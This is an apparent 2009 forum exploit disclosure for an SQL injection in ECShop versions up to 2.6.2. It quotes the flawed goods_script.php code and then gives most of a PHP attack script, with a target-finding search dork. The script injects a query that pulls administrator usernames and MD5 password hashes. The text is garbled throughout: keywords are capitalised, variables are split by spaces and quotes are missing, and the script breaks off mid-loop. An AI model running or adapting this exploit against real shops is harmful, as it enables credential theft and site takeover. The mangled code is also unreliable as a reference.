By Ryat
Http://bbs.wolvez.org
2009-03-24
Affected 2.5.x and 2.6.x. Other versions are not tested.
Goods_script.php44 rows:
If (empty ($ _ GET [type])
{
...
}
Elseif ($ _ GET [type] = collection)
{
...
}
$ SQL. = "LIMIT ".(! Empty ($ _ GET [goods_num])? Intval ($ _ GET [goods_num]): 10 );
$ Res = $ db-> query ($ SQL );
$ SQL is not initialized, a major vulnerability :)
EXP:
#! /Usr/bin/php
<? Php
Print_r (
+ --------------------------------------------------------------------------- +
ECShop <= v2.6.2 SQL injection/admin credentials disclosure exploit
By puret_t
Mail: puretot at gmail dot com
Team: http://bbs.wolvez.org
Dork: "Powered by ECShop"
+ --------------------------------------------------------------------------- +
);
/**
* Works with register_globals = On
*/
If ($ argc <3 ){
Print_r (
+ --------------------------------------------------------------------------- +
Usage: php. $ argv [0]. host path
Host: target server (ip/hostname)
Path: path to ecshop
Example:
Php. $ argv [0]. localhost/ecshop/
+ --------------------------------------------------------------------------- +
);
Exit;
}
Error_reporting (7 );
Ini_set (max_execution_time, 0 );
$ Host = $ argv [1];
$ Path = $ argv [2];
$ Resp = send ();
Preg_match (# href = "([S] +) :( [a-z0-9] {32})" #, $ resp, $ hash );
If ($ hash)
Exit ("Expoilt Success! Admin: $ hash [1] Password (md5): $ hash [2] ");
Else
Exit ("Exploit Failed! ");
Function send ()
{
Global $ host, $ path;
$ Cmd = SQL = SELECT CONCAT (user_name, 0x3a, password) as goods_id FROM ecs_admin_user WHERE action_list = 0x. bin2hex (all). LIMIT 1 #;
$ Data = "POST". $ path. "goods_script.php? Type = ". time ()." HTTP/1.1 ";
$ Data. = "Accept :*/*";
$ Data. = "Accept-Language: zh-cn ";
$ Data. = "Content-Type: application/x-www-form-urlencoded ";
$ Data. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1 )";
$ Data. = "Host: $ host ";
$ Data. = "Content-Length:". strlen ($ cmd )."";
$ Data. = "Connection: Close ";
$ Data. = $ cmd;
$ Fp = fsockopen ($ host, 80 );
Fputs ($ fp, $ data );
$ Resp =;
While ($ fp &&! Feof ($ fp ))